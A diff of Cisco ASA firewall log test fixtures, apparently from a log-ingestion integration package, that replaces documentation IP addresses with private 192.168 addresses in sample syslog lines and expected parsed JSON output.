destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app +Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com +Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside +Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username) diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index 9195be0b43f..876d13e8e31 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -43,13 +43,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565572200Z", - "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:34:16.394993200Z", + "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -76,8 +76,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -113,13 +113,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.565579400Z", - "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:34:16.395002200Z", + "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -146,8 +146,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2241, @@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565585600Z", - "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395008300Z", + "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565590700Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:34:16.395031600Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { @@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565594700Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:34:16.395053100Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565599Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:34:16.395058800Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" @@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565602600Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:34:16.395064300Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565607900Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:34:16.395069800Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565613400Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:34:16.395075200Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565619900Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:34:16.395080600Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" @@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565627500Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:34:16.395086100Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-10-06T20:55:38.565635400Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:34:16.395092Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-10-06T20:55:38.565643Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:34:16.395097700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565650900Z", + "ingested": "2021-12-09T13:34:16.395103300Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ -1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565658400Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:34:16.395108700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" @@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565666100Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:34:16.395114200Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 @@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565673900Z", - "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:34:16.395119800Z", + "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, @@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565681600Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395125300Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565689300Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395130800Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, @@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565696900Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395136200Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565701200Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395141700Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, @@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565706600Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395147Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565712100Z", - "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395152900Z", + "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, @@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565718700Z", - "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395158500Z", + "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565724100Z", - "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395165900Z", + "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565728100Z", + "ingested": "2021-12-09T13:34:16.395171200Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565732400Z", - "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395176100Z", + "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565736Z", - "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:34:16.395181700Z", + "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565741300Z", - "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:34:16.395187200Z", + "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565746700Z", - "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395192700Z", + "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, @@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565753400Z", - "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395198100Z", + "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565761200Z", - "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395203500Z", + "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, @@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565768900Z", - "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 